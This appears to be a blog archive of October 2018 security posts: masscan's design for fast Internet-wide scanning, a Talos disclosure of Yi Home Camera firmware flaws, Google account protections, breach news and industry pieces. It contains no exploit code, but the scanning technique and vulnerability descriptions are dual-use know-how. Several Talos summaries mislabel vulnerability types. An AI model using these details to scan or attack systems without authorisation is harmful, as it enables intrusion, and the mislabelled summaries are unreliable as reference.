Monthly Archives: October 2018

Masscan and massive address lists

I saw this go by on my Twitter feed. I thought I'd blog on how masscan solves the same problem.

Both nmap and masscan are port scanners. The differences is that nmap does an intensive scan on a limited range of addresses, whereas masscan does a light scan on a massive range of addresses, including the range of - (all addresses). If you've got a 10-gbps link to the Internet, it can scan the entire thing in under 10 minutes, from a single desktop-class computer.

How massan deals with exclude ranges is probably its defining feature. That seems kinda strange, since it's a little used feature in nmap. But when you scan the entire list, people will complain, with nasty emails, so you are going to build up a list of hundreds, if not thousands, of addresses to exclude from your scans.

Therefore, the first design choice is to combine the two lists, the list of targets to include and the list of targets to exclude. Other port scanners don't do this because they typically work from a large include list and a short exclude list, so they optimize for the larger thing. In mass scanning the Internet, the exclude list is the largest thing, so that's what we optimize for. It makes sense to just combine the two lists.

So the performance now isn't how to lookup an address in an exclude list efficiently, it's how to quickly choose a random address from a large include target list.

Moreover, the decision is how to do it with as little state as possible. That's the trick for sending massive numbers of packets at rates of 10 million packets-per-second, it's not keeping any bookkeeping of what was scanned. I'm not sure exactly how nmap randomizes it's addresses, but the documentation implies that it does a block of a addresses at a time, and randomizes that block, keeping state on which addresses it's scanned and which ones it hasn't.

The way masscan is not to randomly pick an IP address so much as to randomize the index.

To start with, we created a sorted list of IP address ranges, the targets. The total number of IP addresses in all the ranges is target_count (not the number of ranges but the number of all IP addresses). We then define a function pick() that returns one of those IP addresses given the index:

    ip = pick(targets, index);

Where index is in the range [0..target_count].

This function is just a binary search. After the ranges have been sorted, a start_index value is added to each range, which is the total number of IP addresses up to that point. Thus, given a random index, we search the list of start_index values to find which range we've chosen, and then which IP address address within that range. The function is here, though reading it, I realize I need to refactor it to make it clearer. (I read the comments telling me to refactor it, and I realize I haven't gotten around to that yet :-).

Given this system, we can now do an in-order (not randomized) port scan by doing the following:

    for (index=0; index<target_count; index++) {
        ip = pick(targets, index);

Now, to scan in random order, we simply need to randomize the index variable.

    for (index=0; index<target_count; index++) {
        xXx = shuffle(index);
        ip = pick(targets, xXx);

The clever bit is in that shuffle function (here). It has to take an integer in that range [0..target_count] and return another pseudo-random integer in the same range. It has to be a function that does a one-to-one mapping. Again, we are stateless. We can't create a table of all addresses, then randomize the order of the table, and then enumerate that table. We instead have to do it with an algorithm.

The basis of that algorithm, by the way, is DES, the Data Encryption Standard. That's how a block cipher works. It takes 64-bit number (the blocksize for DES) and outputs another 64-bit block in a one-to-one mapping. In ECB mode, every block is encrypted to a unique other block. Two input blocks can't encrypt into the same output block, or you couldn't decrypt it.

The only problem is the range isn't neat 64-bit blocks, or any number of bits. It's an inconveniently sized number. A cryptographer Phillip Rogaway wrote a paper how to change DES to support integer ranges instead. The upshot is that it uses integer division instead of shifts, which makes it more expensive.

So how we randomize that input variable is that we encrypt it, where the encrypted number is still in the same range.

Thus, the source of masscan's speed is the way it randomizes the IP addresses in a wholly stateless manner. It:
  • doesn't use any state, just enumerates an index from [0..target_count]
  • has a fast function given an index, retrieve the indexed IP address from a large list of ranges
  • has a fast function to randomize that index using the Power of Crypto
Given this as the base, there's lots of additional features we can add. For one thing, we are randomizing not only IP addresses to scan, but also ports. I think nmap picks the IP address first, then runs through a list of ports on that address. Masscan combines them altogether, so when scanning many ports on an address, they won't come as a burst in the middle of the scan, but be spread evenly throughout the scan. It allows you to do things like:

    masscan -p0-65535

For this to work, we make the following change to the inner loop:

    range = port_count * target_count;
    for (index=0; index<range; index++) {
        xXx = shuffle(index);
        ip = pick(targets, xXx % target_count);
        port = pick(targets, xXx / target_count);
        scan(ip, port);

By the way, the compile optimizes both the modulus and division operations into a single IDIV opcode on Intel x86, since that's how that instruction works, returning both results at once. Which is cool.

Another change we can make is sharding, spreading the scan across several CPUs or several servers. Let's say this is server #3 out of 7 servers sharing the load of the scan:

    for (index=shard; index<range; index += shard_count) {

Again, notice how we don't keep track of any state here, it's just a minor tweak to the loop, and now *poof* the sharding feature appears out of nowhere. It takes vastly more instructions to parse the configuration parameter (masscan --shard 3/7 ...) than it takes to actually do it.

Let's say that we want to pause and resume the scan. What state information do we need to save? The answer is just the index variable. Well, we also need the list of IP addresses that we are scanning. A limitation of this approach is that we cannot easily pause a scan and change the list of IP addresses.


The upshot here is that we've twisted the nature of the problem. By using a crypto function to algorithmically create a one-to-one mapping for the index variable, we can just linearly enumerate a scan -- but magically in random order. This avoids keeping state. It avoids having to lookup addresses in an exclude list. And we get other features that naturally fall out of the process.

What about IPv6?

You'll notice I talking only about IPv4, and masscan supports only IPv4. The maximum sized scan right now is 48 bits (16-bit port number plus 32-bit IPv4 address). Won't larger scans mean using 256 bit integers?

When I get around to adding IPv6, I'll still keep a 64-bit index. The index variable is the number of things you are going to probe, and you can't scan 64-bit space right now. You won't scan the entire IPv6 128-bit address space, but a lot of smaller address spaces that add up to less than 64-bits. So when I get around to adding IPv6, the concept will still work.

NBlog Nov 1 – cloud computing security awareness module released

Cloud computing is a strong and still growing part of the IT industry. It’s a hit!
However, the relative novelty of cloud computing puts inexperienced or naive managers, staff and professionals at something of a disadvantage: lacking appreciation of the technology and the commercial/business context, the information risks and especially the security and other cloud-related controls aren’t exactly obvious.
Information security (in the broadest sense – not just IT or cybersecurity) is a major concern with cloud computing, a source of aggravation and costs for the unaware. The organization's professionals/specialists in areas such as IT, risk, compliance and business continuity should have a deeper understanding of the pros and cons of clouds but have you every wondered how that level of knowledge is achieved? 
Simply put, securing the anticipated business benefits of cloud computing involves addressing the information risks that are associated with it.  If the risks are simply ignored, the benefits may be reduced or destroyed by costly security incidents. 

Learning objectives

We have thoroughly updated/rewritten the awareness materials originally delivered back in 2014 - eons ago in Internet time! So what has changed since then? 
Peer through the fog to learn how to avoid the pitfalls and secure the business benefits of cloud computing, with NoticeBored.
  • Introduces and outlines cloud computing, providing general context and background information (e.g. explaining why so many organizations are eagerly adopting it) with as little techno-babble as we can get away with;
  • Informs workers in general about the information risk and security issues and concerns relating to or arising from cloud computing (e.g. the organization’s partial loss of control over its information), plus the business benefits (e.g. reduced costs, greater resilience and flexibility, plus access to cloud specialists). We’re promoting a balanced view;
  • Encourages those considering, specifying, evaluating, contracting for, using or managing cloud computing to identify, analyze and address the information risks, typically through appropriate controls that secure the business benefits as much as the data;
  • Promotes information risk and security management as a business enabler, without which cloud computing would be unacceptably risky.
Review your organization’s use of cloud computing - the apps, dependent business processes, strategies, policies and incidents. Are there any cloud -related risks on the corporate radar? How well are they understood and treated? What’s missing? What stands out? Talk to the relevant experts about it. Flush any issues and ideas into the open, incorporating them where appropriate into your awareness delivery.

And talk to us about subscribing to turbo-charge your awareness program. 

Announcing some security treats to protect you from attackers’ tricks

It’s Halloween 🎃 and the last day of Cybersecurity Awareness Month 🔐, so we’re celebrating these occasions with security improvements across your account journey: before you sign in, as soon as you’ve entered your account, when you share information with other apps and sites, and the rare event in which your account is compromised.

We’re constantly protecting your information from attackers’ tricks, and with these new protections and tools, we hope you can spend your Halloween worrying about zombies, witches, and your candy loot—not the security of your account.

Protecting you before you even sign in
Everyone does their best to keep their username and password safe, but sometimes bad actors may still get them through phishing or other tricks. Even when this happens, we will still protect you with safeguards that kick-in before you are signed into your account.

When your username and password are entered on Google’s sign-in page, we’ll run a risk assessment and only allow the sign-in if nothing looks suspicious. We’re always working to improve this analysis, and we’ll now require that JavaScript is enabled on the Google sign-in page, without which we can’t run this assessment.

Chances are, JavaScript is already enabled in your browser; it helps power lots of the websites people use everyday. But, because it may save bandwidth or help pages load more quickly, a tiny minority of our users (0.1%) choose to keep it off. This might make sense if you are reading static content, but we recommend that you keep Javascript on while signing into your Google Account so we can better protect you. You can read more about how to enable JavaScript here.

Keeping your Google Account secure while you’re signed in

Last year, we launched a major update to the Security Checkup that upgraded it from the same checklist for everyone, to a smarter tool that automatically provides personalized guidance for improving the security of your Google Account.

We’re adding to this advice all the time. Most recently, we introduced better protection against harmful apps based on recommendations from Google Play Protect, as well as the ability to remove your account from any devices you no longer use.
More notifications when you share your account data with apps and sites

It’s really important that you understand the information that has been shared with apps or sites so that we can keep you safe. We already notify you when you’ve granted access to sensitive information — like Gmail data or your Google Contacts — to third-party sites or apps, and in the next few weeks, we’ll expand this to notify you whenever you share any data from your Google Account. You can always see which apps have access to your data in the Security Checkup.

Helping you get back to the beginning if you run into trouble

In the rare event that your account is compromised, our priority is to help get you back to safety as quickly as possible. We’ve introduced a new, step-by-step process within your Google Account that we will automatically trigger if we detect potential unauthorized activity.

We'll help you:
  • Verify critical security settings to help ensure your account isn’t vulnerable to additional attacks and that someone can’t access it via other means, like a recovery phone number or email address.
  • Secure your other accounts because your Google Account might be a gateway to accounts on other services and a hijacking can leave those vulnerable as well.
  • Check financial activity to see if any payment methods connected to your account, like a credit card or Google Pay, were abused.
  • Review content and files to see if any of your Gmail or Drive data was accessed or mis-used.
Online security can sometimes feel like walking through a haunted house—scary, and you aren't quite sure what may pop up. We are constantly working to strengthen our automatic protections to stop attackers and keep you safe you from the many tricks you may encounter. During Cybersecurity Month, and beyond, we've got your back.

Vulnerability Spotlight: Multiple Vulnerabilities in Yi Technology Home Camera

Vulnerabilities Discovered by Lilith [x_x] of Cisco Talos.


Cisco Talos is disclosing multiple vulnerabilities in the firmware of the Yi Technology Home Camera. In order to prevent the exploitation of these vulnerabilities, Talos worked with Yi Technology to make sure a newer version of the firmware is available to users. These vulnerabilities could allow an attacker to gain remote code execution on the devices via a command injection, bypass methods of network authentication, or disable the device.

The Yi Home Camera is an internet-of-things (IoT) home camera sold globally. The 27US version is one of the newer models sold in the U.S. and is the most basic model out of the Yi Technology camera lineup.

It includes all the functions that one would expect from an IoT device, including the ability to view the camera's feed from anywhere, offline storage, subscription-based cloud storage and easy setup.

There are many consequences to a security vulnerability within the firmware of this security camera. An attacker could exploit these vulnerabilities to:

  • Disable the camera to prevent it from recording.
  • Delete stored videos on the camera.
  • View video feeds from the camera.
  • Potentially launch attacks against the camera owner's phone app.
  • Act as a foothold into the home network to attack other devices inside.

This list is not complete, and many other consequences could occur, so Talos highly recommends that the devices are patched as soon as possible via the Yi Home application.


Due to the nature of IoT devices, more attack surfaces are available on a given device than a typical server or client program. For half of the vulnerabilities, physical access is required to exploit them, which obviously makes them less of a concern if the camera is stored safely inside of the venue that they are protecting, but for the other five vulnerabilities, there is a network attack vector, raising their severity and the importance of getting the latest firmware.

Before summarizing these network-based vulnerabilities, it is important to note that they are all made possible by TALOS-2018-0616, as all of these vulnerabilities are over cleartext protocols, either unencrypted UDP or HTTP. If the slight performance hit was taken to implement the core network functionality over HTTPS, these vulnerabilities would either not have been as severe, or not have been exploitable at all.

Denial of service:

TALOS-2018-0602 and TALOS-2018-0595 were both found within the p2p_tnp binary, which is the main controller for phone-to-camera and cloud-to-camera communication. That binary also implements a custom UDP peer-to-peer (p2p) protocol for all of the aforementioned features. In both vulnerabilities, some seemingly artifact opcodes could be accessed without authentication, which would allow an attacker to either permanently disable the video feed or cause unlimited memory to be allocated, both rendering the camera useless.

Remote Code Execution:

TALOS-2018-0567 is easily the most severe vulnerability out of the batch, requiring only the ability to respond to an HTTP request from the camera in order to hit a command injection and subsequent code execution. The vulnerable time_sync request happens extremely often as soon as the device connects to the network.

Administrative Access:

The last of the network-based vulnerabilities, TALOS-2018-0601 allows an attacker to reuse tokens that can be sniffed over the wire via TALOS-2018-0616 so that one sniffed token can be used an unlimited number of times by an attacker to access the p2p_tnp API that is normally reserved for the camera's owner via the Yi Home phone application. This access only lasts until the device reboots, at which point another token needs to be sniffed.

Physical and Local Attack Vectors:

As noted above, IoT devices tend to lend themselves to vulnerabilities with more unusual attack vectors, and the Yi Home Camera is no exception. Vulnerabilities were found via the firmware update functionality (TALOS-2018-0565, TALOS-2018-0584 and TALOS-2018-0566), the SSID that the camera connects to for wireless access (TALOS-2018-0580) and via the QR code that is used when setting up the device out of the box (TALOS-2018-0572 and TALOS-2018-0571). Because of this, it is suggested that these devices are not kept in areas where they are physically available to others, and once again, that the devices' firmware is updated as soon as possible.

Vulnerability Summaries

TALOS-2018-0565 -- Yi Technology Home Camera 27US Firmware Update Code Execution Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US A specially crafted file can cause a logic flaw and command injection, resulting in code execution. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0566 / CVE-2018-3891 - Yi Technology Home Camera 27US Firmware Downgrade Vulnerability

An exploitable firmware downgrade vulnerability exists in the firmware update functionality of Yi Home Camera 27US A specially crafted file can cause a logic flaw, resulting in a firmware downgrade. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0567 -- Yi Technology Home Camera 27US TimeSync Code Execution Vulnerability

An exploitable firmware downgrade vulnerability exists in the time syncing functionality of Yi Home Camera 27US A specially crafted packet can cause a buffer overflow, resulting in code execution. An attacker can intercept and alter network traffic to trigger this vulnerability.

TALOS-2018-0571 / CVE-2018-3898-CVE-2018-3899 - Yi Technology Home Camera 27US QR Code trans_info Code Execution Vulnerability

An exploitable code execution vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US A specially QR Code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0572 / CVE-2018-3900 - Yi Technology Home Camera 27US QR Code Base64 Code Execution Vulnerability

An exploitable firmware downgrade vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US A specially QR code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0580 / CVE-2018-3910 - Yi Technology Home Camera 27US cloudAPI SSID Code Execution Vulnerability

An exploitable code execution vulnerability exists in the cloud OTA setup functionality of Yi Home Camera 27US A specially crafted SSID can cause a command injection, resulting in code execution. An attacker can cause a camera to connect to this SSID to trigger this vulnerability. Alternatively, an attacker can convince a user to connect their camera to this SSID.

TALOS-2018-0595 / CVE-2018-3928 - Yi Technology Home Camera 27US Notice_To Denial Of Service Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US A specially crafted set of UDP packets can cause the settings to change, resulting in a denial of service. An attacker can send a set of packets to trigger this vulnerability.

TALOS-2018-0601 / CVE-2018-3934 - Yi Technology Home Camera 27US Nonce Reuse Authentication Bypass Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US A specially crafted set of UDP packets can cause a logic flaw, resulting in an authentication bypass. An attacker can sniff network traffic and send a set of packets to trigger this vulnerability.

TALOS-2018-0616 / CVE-2018-3947 - Yi Technology Home Camera 27US p2p_tnp Cleartext Data Transmission Vulnerability

An exploitable information disclosure vulnerability exists in the phone-to-camera communications of Yi Home Camera 27US An attacker can sniff network traffic and trigger this vulnerability.

TALOS-2018-0602 / CVE-2018-3935 - Yi Technology Home Camera 27US CRCDec Denial Of Service Vulnerability

An exploitable code execution vulnerability exists in the UDP network functionality of Yi Home Camera 27US A specially crafted set of UDP packets can allocate unlimited memory, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability.

Versions Tested

The Yi Technology Home Camera 27US version of the firmware was used during the discovery of the vulnerabilities listed above.

Firmware at Yi Technology 


With the increased convenience of IoT devices, a new set of attack vectors arose that have not been as hardened as traditional ones. As such, Talos recommends that users apply these newly available firmware updates in order to ensure their continued and secure operation. This can be done via the Yi Home phone app, which will notify the user of this new firmware upon being opened. It is also recommended that the user checks the device's firmware version after the update, via the phone app, in order to ensure that the update did in fact occur.


The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or

Snort Rules:
46190-46191. 46294-46295. 46780. 46870.

For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal here.

To review our Vulnerability Disclosure Policy, please visit this site here.

NIST’s Creation of a Privacy Framework

On Tuesday, Oct. 16, the National Institute of Standards and Technology (NIST) held its “Kicking off the NIST Privacy Framework: Workshop #1” in Austin, Texas. I was honored to be asked to participate. This was the first in a series of public workshops focusing on the development of a useful and voluntary Privacy Framework, like the NIST Cybersecurity Framework (CSF).

Event participation was outstanding. NIST’s initial registration for the event was filled in less than 90 minutes. Realizing they needed a bigger room, NIST moved to a space that nearly doubled the potential attendance. When the reopening of the registration was announced, it was filled in less than an hour. Many well-known names in the privacy field attended, with the audience primarily consisting of privacy consultants, lawyers, and other professionals trying to figure out how the Privacy Framework fits into their future.

NIST previously brought together both public and private sector individuals interested in solving problems that face us all. The CSF was a highly successful effort to develop a lightweight, valuable, and adoptable framework focused on improving the “security programs” of organizations. While initially developed in response to presidential executive order 13636, the CSF was never meant to be a government document. Speaking to critical infrastructure and cybersecurity organization representatives at the first Cybersecurity Framework meeting, previous NIST director Dr. Pat Gallagher said, “This is not NIST’s framework, this is yours.” He was absolutely right.

Over the next year, more than 3,000 professionals participated in CSF workshops, responded to requests for information, and provided comments on work-in-progress drafts. The result was something that achieved the CSF’s initial goals: It’s beneficial to all sectors and is usable by a range of organizations from small businesses to some of the largest corporations on the planet. The CSF is having a positive global influence with its adoption by various countries. It’s also assisting in the global alignment of cybersecurity languages and practices.

NIST has established many of the same goals for the Privacy Framework. These goals include:

  1. Developing the Privacy Framework through a consensus-driven, open, and highly transparent process
  2. Establishing a common language, providing for a consistent means to facilitate communication across all aspects of an organization
  3. Ensuring it is adaptable and scalable to many differing types of organizations, technologies, lifecycle phases, sectors, and uses
  4. Developing a voluntary, risk-based, outcome-based, and non-prescriptive privacy framework
  5. Ensuring it is usable as part of any organization’s broader corporate risk management strategy and processes
  6. Taking advantage of and incorporating existing privacy standards, methodologies, and guidance
  7. Establishing it as a living document that is updated as technology and approaches to privacy change and as stakeholders learn from implementations

During the Privacy Framework Kickoff, I was pleased to hear questions that were similar to what I heard during the initial CSF Kickoff. There was real tension in the room during the CSF Kickoff—a sense of not knowing how it was going to impact organizations’ cybersecurity-related responsibilities. The same tension was present during the Privacy Framework Kickoff conversations. We are just beginning to try to understand a solution that doesn’t yet exist.

It’s hard to see the result of a Privacy Framework from where we sit today. How can we develop and position a framework like this to be valuable for both U.S. and global businesses? What is intended for this effort? What are potential definition needs? What is harm? What new technology could influence this? How do we position this for the next 25 years of privacy, not just the past five?

We have started down a path that will likely take more than a year to complete. I envision the emerging Privacy Framework as addressing best practices in privacy while being compatible with and supporting an organization’s ability to operate under the various domestic and international legal or regulatory regimes. The Privacy Framework should not be focused on the legal aspects of privacy, but rather on what organizations need to consider in their own privacy programs. This is a journey just begun. From my perspective, the workshop on Oct. 16 was an outstanding start to the development of a consensus-driven Privacy Framework. I look forward to the active discussions and work ahead.

The post NIST’s Creation of a Privacy Framework appeared first on McAfee Blogs.

Cyber Security Roundup for October 2018

Aside from Brexit, Cyber Threats and Cyber Attack accusations against Russia are very much on the centre stage of UK government's international political agenda at the moment. The government publically accused Russia's military 'GRU' intelligence service of being behind four high-profile cyber-attacks, and named 12 cyber groups it said were associated with the GRU. Foreign Secretary Jeremy Hunt said, "the GRU had waged a campaign of indiscriminate and reckless cyber strikes that served no legitimate national security interest".

UK Police firmly believe the two men who carried out the Salisbury poisoning in March 2018 worked for the GRU.

The UK National Cyber Security Centre said it had assessed "with high confidence" that the GRU was "almost certainly responsible" for the cyber-attacks, and also warned UK businesses to be on the alert for indicators of compromise by the Russian APT28 hacking group.  The NCSC said GRU hackers operated under a dozen different names, including Fancy Bear (APT28), had targetted:
  • The systems database of the Montreal-based World Anti-Doping Agency (Wada), using phishing to gain passwords. Athletes' data was later published 
  • The Democratic National Committee in 2016, when emails and chats were obtained and subsequently published online. The US authorities have already linked this to Russia.
  • Ukraine's Kyiv metro and Odessa airport, Russia's central bank, and two privately-owned Russian media outlets - and news agency Interfax - in October 2017. They used ransomware to encrypt the contents of a computer and demand payment 
  • An unnamed small UK-based TV station between July and August 2015, when multiple email accounts were accessed and content stolen

Facebook was fined the maximum amount of £500,000 under pre-GDPR data protection laws by the UK Information Commissioner's Office (ICO) over the Cambridge Analytica Scandal. Facebook could face a new ICO fine after revealing hackers had accessed the contact details of 30 Million users due to a flaw with Facebook profiles. The ICO also revealed a 400% increase in reported Cyber Security Incidents and another report by a legal firm RPC said the average ICO fines had doubled, and to expect higher fines in the future. Heathrow Airport was fined £120,000 by the ICO in October after a staff member lost a USB stick last October containing "sensitive personal data", which was later found by a member of the public.

Notable Significant ICO Security Related Fines

Last month's British Airways website hack was worse than originally reported, as they disclosed a second attack which occurred on 5th September 2018, when the payment page had 22 lines of malicious Javascript code injected in an attack widely attributed to Magecart.  Another airline Cathay Pacific also disclosed it had suffered a major data breach that impacted 9.4 million customer's personal data and some credit card data.

Morrisons has lost a challenge to a High Court ruling which made it liable for a data breach, after an employee, since jailed for 8 years, stole and posted thousands of its employees' details online in 2014.  Morrisons said it would now appeal to the Supreme Court., if that appeal fails, those affected will be able to claim compensation for "upset and distress". 

Interesting article on Bloomberg on "How China Used a Tiny Chip to Infiltrate U.S. Companies". However, there was a counter-narrative to the Bloomberg article on Sky News. But didn't stop Ex-Security Minister Admiral Lord West calling the Chinese when he said Chinese IT Kit 'is putting all of us at risk' if used in 5G.  He raises a valid point, given the US Commerce Department said it would restrict the export of software and technology goods from American firms to Chinese chipmaker Fujian Jinhua BT, which uses Huawei to supply parts for its network, told Sky News that it would "apply the same stringent security measures and controls to 5G when we start to roll it out, in line with continued guidance from government". Recently there have been warnings issued by the MoD and NCSC stating a Chinese espionage group known as APT10 are attacking IT suppliers to target military and intelligence information.

NCSC is seeking feedback on the latest drafts 'knowledge areas' on CyBOK, a Cyber Security body of knowledge which it is supporting along with academics and the general security industry.

Google are finally pulling the plug on Google+, after user personal data was left exposed. Google and the other three major web browser providers in the world said, in what seems like coordinated announcements, businesses must accept TLS Version 1.0 and 1.1 will no longer support after Q1 2018.

So its time to move over to the more secure TLS V1.2 or the more secure & efficient TLS V1.3.


How to Empower Security Operations With Threat Intelligence

Editor’s Note: Over the next several months, we’ll be sharing excerpts from our new book, “The Threat Intelligence Handbook.” Here, we’re looking at the second chapter, “Threat Intelligence for Security Operations.” To read the full chapter, download your free copy of the handbook.

With the goal of monitoring and analyzing network activity to detect and defeat cybersecurity threats and other anomalies always in mind, the security operations center represents the first line of defense for any organization big enough to have one. And even if your organization is too small to justify the costs of having a dedicated SOC (which can be prodigious), the function of looking out for threats and stopping them is one that nobody can live without.

But the numerous vital functions that SOC analysts perform — tasks like log monitoring, incident response, compliance, penetration and vulnerability testing, key and access management, and so on — can take years of experience to develop competency in. These diverse functions also often run on numerous disconnected systems, leaving analysts to deal with countless streams of data and alert feeds that can overwhelm even the most weathered security practitioner. Analysts yearn for a “single pane of glass” solution — one place where all the tasks they have to deal with show up with the context and timeliness they need to prioritize their work.

Threat intelligence is essential for making this picture a reality. Good threat intelligence provides exactly the context needed to enrich data feeds, reduce alert fatigue, and help SOC analysts work more efficiently and make informed decisions.

The following excerpt on this topic from “The Threat Intelligence Handbook” has been edited and condensed for clarity.

Threat Intelligence for Security Operations

Most security operations center (SOC) teams find themselves hostages to the huge volumes of alerts generated by the networks they monitor. Triaging these alerts takes too long, and many are never investigated at all. “Alert fatigue” leads analysts to take alerts less seriously than they should.

Threat intelligence provides an antidote to many of these problems. Among other uses, it can be employed to filter out false alarms, speed up triage, and simplify incident analysis.

Responsibilities of the SOC Team

On paper, the responsibilities of the SOC team seem simple:

  • Monitor for potential threats
  • Detect suspicious network activity
  • Contain active threats
  • Remediate using available technology

When a suspicious event is detected, the SOC team investigates, then works with other security teams to reduce the impact and severity of the attack. You can think of the roles and responsibilities within a SOC as being similar to those of emergency services teams responding to 911 calls.

The Overwhelming Volume of Alerts

Over the past several years, most enterprises have added new types of threat detection technologies to their networks. Every tool sounds the alarm when it sees anomalous or suspicious behavior. In combination, these tools can create a cacophony of security alerts. Security analysts are simply unable to review, prioritize, and investigate all these alerts on their own. Because of alert fatigue, all too often they ignore alerts, chase false positives, and make mistakes.

Research confirms the magnitude of these problems. Industry analyst firm ESG asked cybersecurity professionals about their biggest security operations challenge, and 35 percent said it was “keeping up with the volume of security alerts.” In its 2018 State of the SOC report, SIEM provider Exabeam revealed that SOCs are understaffed according to 45 percent of professionals who work in them, and of those, 63 percent think they could use anywhere from two to 10 additional employees. Cisco’s 2018 Security Capabilities Benchmark study found that organizations can investigate only 56 percent of the security alerts they receive on a given day, and of those investigated alerts, only 34 percent are deemed legitimate.

Context Is King

At its heart, threat intelligence for the SOC is about enriching internal alerts with the external information and context necessary to make risk-based decisions. Context is critical for rapid triage, and also very important for scoping and containing incidents.

Triage Requires Lots of Context

A huge part of an average SOC analyst’s day is spent responding to alerts generated by internal security systems, such as SIEM or EDR technologies. Sources of internal data are vital in identifying potentially malicious network activity or a data breach.

Unfortunately, this data is often difficult to interpret in isolation. Determining if an alert is relevant and urgent requires gathering related information (context) from a wide variety of internal system logs, network devices, and security tools, and from external threat databases. Searching all of these threat data sources for context around each alert is hugely time consuming.

Security Monitoring

Key aspects of security monitoring and internal sources of context. (Source: UK NCSC)

Improving the “Time to No”

As important as it is for SOC analysts to gather information about real threats more quickly and accurately, there is an argument to be made that the ability to rapidly rule out false alarms is even more important.

Threat intelligence provides SOC staff with additional information and context needed to triage alerts promptly and with far less effort. It can prevent analysts from wasting hours pursuing alerts based on:

  • Actions that are more likely to be innocuous rather than malicious
  • Attacks that are not relevant to that enterprise
  • Attacks for which defenses and controls are already in place

Some threat intelligence solutions automatically perform much of this filtering by customizing risk feeds to ignore or downgrade alerts that do not match organization- and industry-specific criteria.

Beyond Triage

As well as accelerating triage, threat intelligence can help SOC teams simplify incident analysis and containment.

For example, by revealing that a certain piece of malware is often used by cybercriminals as the first step in an attack on financial applications, the SOC team can start monitoring those applications more closely and home in on other evidence of that attack type.

Get The Threat Intelligence Handbook

The full chapter of the book also features an extensive use case looking at the value of enriching your data (as well as more helpful images and diagrams). Raw threat feeds don’t offer the context needed to evaluate whether an alert is critical to respond to or irrelevant (or a false positive). For analysts who have to respond to countless alerts daily, trying to triage an initial alert without access to enough context is like a person trying to understand a news story after reading just the headline.

To read the full chapter, including this use case, download your free copy of “The Threat Intelligence Handbook” today.

The post How to Empower Security Operations With Threat Intelligence appeared first on Recorded Future.


Tomorrowland festival goers affected by data breach

Tomorrowland, a major international music festival, has revealed a data breach potentially affecting around 60,000 attendees.

This one is a little different though, as the data accessed without permission isn’t recent. In fact, it dates back four years to an event long since come and gone. According to a Tomorrowland spokesperson, the managers of the Paylogic ticketing system noticed “unusual activity” on an older server. This server contained data for the 2014 event, but the hackers left everything else alone.

“Sensitive” versus “not sensitive”

The hacked server is now offline, and anyone potentially affected should have been made aware of what’s going to happen next. As with most breaches, it involves notification emails and a helpful set of suggestions for cybersecurity best practices.

Accounts conflict about what specifically was breached, accessed, and stolen in the Tomorrowland attack. This may be due to primary news sources being in languages other than English, and things are being lost in translation.

Tomorrowland representatives claim access to sensitive data did not take place. This is where things become reliant on your personal definition of what constitutes “bad” or merely “sort of bad.”

Data taken includes name, email, gender, age, and post code. Data not taken includes payment details, passwords, and addresses.

I suspect everyone’s mileage may vary greatly with regards to what constitutes “sensitive data” here. Depending on which region of the world you come from, a post code alone could drill you down to a couple of houses or a single street. At that point, the specific address probably doesn’t matter too much. With the post code and a name, you could easily find the exact house via publicly-listed information, a voting register, or a house sale.

That seems pretty sensitive to me.

Phishing risks

A dubious phishing attempt is more than doable here as a result of the data taken by scammers. Any communications regarding ticket sales, offers, promotions, or anything else you can think of should be greeted with a healthy dose of suspicion.

Revisit your mailbox and check for any interactions with event organisers the moment you receive any official communications. Have a look at anything you’ve replied to related specifically to Tomorrowland. In particular, pay attention to anything involving payments, password resets, or submission of further personal information. Ignore all rogue emails and send them straight to the recycling bin.

Without further information on when the breach took place, it’s difficult to say how long people should be concerned. We don’t know if the unauthorised access took place last week, last month, or last year. We can’t say how long people were sitting on the stolen information, or if it’s old news for scammers. Potentially, anything worthwhile in the haul has long since stopped being relevant or useful.

Pulling the plug: a good idea

It’s odd that a server containing data from a one-off event in 2014 was still online. Despite this, it’s entirely possible it was online for specific reasons we can’t guess at. Even so, it’s a good cautionary warning to remind admins to take anything offline that doesn’t really need to be there. Even data that should definitely be online for various reasons will often fall victim to attacks and scams.

A full audit, a sensible backup policy, and old data stored securely will solve a lot of these potential headaches. Everybody likes a music festival to be as eventful as possible, but this is perhaps a little too eventful. We hope you experience zero breaches, sensibly priced burgers, and permanently short queues for an abundance of portable toilets.

The post Tomorrowland festival goers affected by data breach appeared first on Malwarebytes Labs.

How to tighten security and increase privacy on your browser

Is my browser making an effort to keep my system safe and my online behavior private? This is usually not the first question we ask ourselves when we choose our default browser. But maybe it should be.

These days, threats to your privacy and security come at your from all angles, but browser-based attacks such as malvertising, drive-by downloads, adware, tracking, and rogue apps make going online and conducting a search a little more dangerous. Therefore, it’s important take note of what browsers are doing to shore up their defenses—and what you can do to optimize them.

When it comes to online privacy, it looks as if the silent majority of Internet users have shifted from the “I have nothing to hide” frame of mind to the “they already know everything anyway” group. And based on recent events, many social media users might right. Effectively, both groups feel as though it is not worth the trouble to jump through hoops to keep their data private. So should this even be a consideration?

While privacy is ultimately a personal choice, we believe it is still a right. So we’ll continue to offer our advise for those who are interested.

But let’s look at the security aspect first. This is something we can all agree on.

Browser security measures

There have been a few initiatives taken recently by the major browsers to enhance their safety.

  • Google has decided that Chrome extensions submitted to the Web Store will not be allowed if they contained “obfuscated” code. According to Google, developers should not have to hide their code. It makes it hard to decide whether they should allow the extension, and most obfuscated extensions turned out to be malicious.
  • Google is in the process of putting an end to “inline installation” of extensions. This means websites can no longer directly install Chrome extensions using the Chrome API, but have to send you to the Web Store. While this process will only be finished by the end of the year, distributors have already adapted their methods to deliver their extensions.
